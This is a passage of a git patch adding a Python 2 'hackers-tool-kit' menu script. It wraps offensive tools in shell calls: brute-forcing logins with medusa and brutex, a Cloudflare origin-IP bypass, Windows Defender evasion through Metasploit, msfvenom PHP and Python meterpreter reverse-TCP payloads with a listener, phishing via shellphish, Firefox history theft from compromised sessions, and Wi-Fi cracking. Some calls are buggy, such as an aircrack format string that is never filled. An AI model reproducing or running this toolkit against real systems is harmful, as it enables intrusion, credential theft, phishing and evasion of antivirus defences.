hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#FOXHIS START# +#------------# +def foxhis(): + os.system('echo "sessions\n" >> foxhisses.rc') + os.system('echo "exit\n" >> foxhisses.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r foxhisses.rc') + os.system('rm -rf foxhisses.rc') + print "\n" + ses = raw_input("Session: ") + print "\nMaximum time (seconds) to wait for a response\n" + time = raw_input("Timeout: ") + os.system('echo "use firefox/gather/history\n" >> foxhis.rc') + os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) + os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) + os.system('echo "run\n" >> foxhis.rc') + os.system('msfconsole -q -r foxhis.rc') + os.system('rm -fr foxhis.rc') +#----------# +#FOXHIS END# + + +#RHAWK START# +#-----------# +def rhawk(): + os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") +#---------# +#RHAWK END# + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + if x == "foxhis": + foxhis() + if x == "rhawk": + rhawk() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From cfa0badae4710f2f1bb13b27c03c82b9cbf47106 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Tue, 28 May 2019 05:45:54 +0100 Subject: [PATCH 156/214] Add files via upload --- redhawk/config.php | 15 + redhawk/crawl/admin.ini | 1 + redhawk/crawl/others.ini | 1 + redhawk/crawl/readme.txt | 23 + redhawk/functions.php | 358 ++++++++++++ redhawk/rhawk.php | 1201 ++++++++++++++++++++++++++++++++++++++ redhawk/sqlerrors.ini | 1 + redhawk/var.php | 44 ++ redhawk/version.txt | 1 + 9 files changed, 1645 insertions(+) create mode 100644 redhawk/config.php create mode 100644 redhawk/crawl/admin.ini create mode 100644 redhawk/crawl/others.ini create mode 100644 redhawk/crawl/readme.txt create mode 100644 redhawk/functions.php create mode 100644 redhawk/rhawk.php create mode 100644 redhawk/sqlerrors.ini create mode 100644 redhawk/var.php create mode 100644 redhawk/version.txt diff --git a/redhawk/config.php b/redhawk/config.php new file mode 100644 index 0000000..2a01c60 --- /dev/null +++ 